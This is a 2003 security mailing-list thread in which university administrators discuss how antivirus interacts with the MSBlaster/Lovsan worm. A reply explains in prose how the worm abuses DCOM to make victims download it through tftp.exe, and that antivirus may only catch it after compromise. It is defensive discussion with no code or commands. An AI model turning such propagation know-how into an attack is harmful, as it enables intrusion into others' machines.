Educause Security Discussion mailing list archives
Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther
From: Gary Dobbins <dobbins () ND EDU>
Date: Tue, 12 Aug 2003 13:15:07 -0500
What we know so far here suggests that the A/V would detect the worm's file(s) as they're being written to disk, *if* scan on write is enabled. But, A/V will probably miss the initial incursion, where the attacker initially causes the unwanted behaviour of the victim's DCOM service process. The attacker tells victim's DCOM to activate tftp.exe, instructing it to fetch its own copy of the actual worm from the attacking machine. At the point tftp writes the received file to disk A/V software may be able to catch it, but the victim is already under the worm's control at this point. Assuming a variant strain of the worm doesn't appear, a positive A/V alert indicates both presence of the vulnerability and success of attack against the recipient. Am surprised, actually, that the author wrote this worm to rely on presence of tftp.exe. Local tftp was used by 'ancient' worms such as nimda, and some nimda remediation recommendations included removing tftp.exe from machines where it wasn't needed. Jim Moore wrote:
I am trying to understand how far Stealther and MBlaster/Lovsan-A get before the latest antivirus intercpts them. What has alarmed me is that I have some reports of a reboot preceding the A/V warning. Also, I am assuming that the most effective is when A/V is set to scan on every write. However, you know that impacts performance and a lot of people slide back to scanning at lunch time, or in the evening. I assume that means that is then the window of opportunity for MBlaster. I am not an A/V expert, can someone validate assumptions, and describe how you handle it in communication to your end user community? Jim -- -- Jim Moore, CISSP, IAM Information Security Officer Rochester Institute of Technology 13 Lomb Memorial Drive Rochester, NY 14623-5603 Telephone: (585)475-5406 Fax: (585)475-7950 PGP (jimmoore () mail rit edu): 9C33 0328 CD59 B602 82B8 8521 0DC9 963C D0C0 ********** Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
********** Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
Current thread:
- Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Jim Moore (Aug 12)
- <Possible follow-ups>
- Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Gary Dobbins (Aug 12)
- Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Jim Moore (Aug 12)
- Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther Omar Herrera (Aug 12)